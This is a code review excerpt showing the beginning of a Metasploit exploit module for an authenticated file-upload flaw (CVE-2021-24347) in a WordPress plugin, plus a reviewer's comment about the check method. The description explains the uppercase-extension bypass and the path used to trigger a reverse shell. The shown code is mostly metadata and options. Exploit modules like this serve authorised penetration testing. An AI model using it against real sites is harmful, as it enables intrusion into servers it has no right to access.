modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
+          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
+          Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
+          making possible to upload `.pHP` files for instance.
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50115'],
+            ['CVE', '2021-24347']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress SP Project & Document < 1.6.0', {}]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-06-14',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    datastore['WPCHECK'] = true
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
```

Comment:
A check method shouldn't use `fail_with`. Can you please update this to `CheckCode::Unknown`?